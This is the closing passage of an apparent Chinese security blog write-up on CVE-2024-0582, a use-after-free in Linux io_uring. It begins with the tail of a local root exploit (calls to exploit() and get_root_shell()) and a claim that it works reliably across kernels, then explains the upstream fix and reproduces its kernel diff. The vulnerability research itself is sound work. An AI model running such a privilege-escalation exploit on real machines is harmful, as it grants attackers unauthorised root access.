get_root_shell();
}

int main(int argc, char **argv, char **envp)
{
exploit();
return 0;
}

运行即可完成提权,非常™稳定而且不依赖于特定的内核镜像:

0x03. 漏洞修复

这个漏洞最终在 这个 commit 当中被修复,修复方式是:

  • 添加了一个记录延迟释放 buffer 的链表与对应结构
  • 将 buffer 释放推迟到调用 ->release() 时,而非原来的即时释放),从而在 mmap() 区域销毁后才会回收这部分内存

这个修改引入了更适用的架构,而且确乎避免了 UAF 的问题,在笔者看来还是比较成功的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
index d3009d56af0ba3..805bb635cdf558 100644
--- a/include/linux/io_uring_types.h
+++ b/include/linux/io_uring_types.h
@@ -340,6 +340,9 @@ struct io_ring_ctx {

struct list_head io_buffers_cache;

+ /* deferred free list, protected by ->uring_lock */
+ struct hlist_head io_buf_list;
+
/* Keep this last, we don't need it for the fast path */
struct wait_queue_head poll_wq;
struct io_restriction restrictions;
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index e40b1143821045..3a216f0744dd66 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -325,6 +325,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
INIT_LIST_HEAD(&ctx->sqd_list);
INIT_LIST_HEAD(&ctx->cq_overflow_list);
INIT_LIST_HEAD(&ctx->io_buffers_cache);
+ INIT_HLIST_HEAD(&ctx->io_buf_list);
io_alloc_cache_init(&ctx->rsrc_node_cache, IO_NODE_ALLOC_CACHE_MAX,
sizeof(struct io_rsrc_node));
io_alloc_cache_init(&ctx->apoll_cache, IO_ALLOC_CACHE_MAX,
@@ -2950,6 +2951,7 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
ctx->mm_account = NULL;
}
io_rings_free(ctx);
+ io_kbuf_mmap_list_free(ctx);

percpu_ref_exit(&ctx->refs);
free_uid(ctx->user);
diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
index a1e4239c7d75d1..85e680fc74ce2c 100644
--- a/io_uring/kbuf.c
+++ b/io_uring/kbuf.c
@@ -33,6 +33,11 @@ struct io_provide_buf {
__u16 bid;
};

+struct io_buf_free {
+ struct hlist_node list;
+ void *mem;
+};
+
static inline struct io_buffer_list *io_buffer_get_list(struct io_ring_ctx *ctx,
unsigned int bgid)
{
@@ -223,7 +228,10 @@ static int __io_remove_buffers(struct io_ring_ctx *ctx,
if (bl->is_mapped) {
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
- folio_put(virt_to_folio(bl->buf_ring));
+ /*
+ * io_kbuf_list_free() will free the page(s) at
+ * ->release() time.
+ */
bl->buf_ring = NULL;
bl->is_mmap = 0;
} else if (bl->buf_nr_pages) {
@@ -531,18 +539,28 @@ error_unpin:
return -EINVAL;
}

-static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
+static int io_alloc_pbuf_ring(struct io_ring_ctx *ctx,
+ struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
- gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
+ struct io_buf_free *ibf;
size_t ring_size;
void *ptr;

ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
- ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
+ ptr = io_mem_alloc(ring_size);
if (!ptr)
return -ENOMEM;

+ /* Allocate and store deferred free entry */
+ ibf = kmalloc(sizeof(*ibf), GFP_KERNEL_ACCOUNT);
+ if (!ibf) {
+ io_mem_free(ptr);
+ return -ENOMEM;
+ }
+ ibf->mem = ptr;
+ hlist_add_head(&ibf->list, &ctx->io_buf_list);
+
bl->buf_ring = ptr;
bl->is_mapped = 1;
bl->is_mmap = 1;
@@ -599,7 +617,7 @@ int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
if (!(reg.flags & IOU_PBUF_RING_MMAP))
ret = io_pin_pbuf_ring(&reg, bl);
else
- ret = io_alloc_pbuf_ring(&reg, bl);
+ ret = io_alloc_pbuf_ring(ctx, &reg, bl);

if (!ret) {
bl->nr_entries = reg.ring_entries;
@@ -649,3 +667,19 @@ void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)

return bl->buf_ring;
}
+
+/*
+ * Called at or after ->release(), free the mmap'ed buffers that we used
+ * for memory mapped provided buffer rings.
+ */
+void io_kbuf_mmap_list_free(struct io_ring_ctx *ctx)
+{
+ struct io_buf_free *ibf;
+ struct hlist_node *tmp;
+
+ hlist_for_each_entry_safe(ibf, tmp, &ctx->io_buf_list, list) {
+ hlist_del(&ibf->list);
+ io_mem_free(ibf->mem);
+ kfree(ibf);
+ }
+}
diff --git a/io_uring/kbuf.h b/io_uring/kbuf.h
index f2d615236b2cb9..6c7646e6057cf5 100644
--- a/io_uring/kbuf.h
+++ b/io_uring/kbuf.h
@@ -51,6 +51,8 @@ int io_provide_buffers(struct io_kiocb *req, unsigned int issue_flags);
int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg);
int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg);

+void io_kbuf_mmap_list_free(struct io_ring_ctx *ctx);
+
unsigned int __io_put_kbuf(struct io_kiocb *req, unsigned issue_flags);

bool io_kbuf_recycle_legacy(struct io_kiocb *req, unsigned issue_flags);

【CVE.0x0C】CVE-2024-0582 漏洞复现及简要分析
https://arttnba3.github.io/2025/02/22/CVE-0X0C-CVE-2024-0582/
作者
arttnba3
发布于
2025年2月22日
许可协议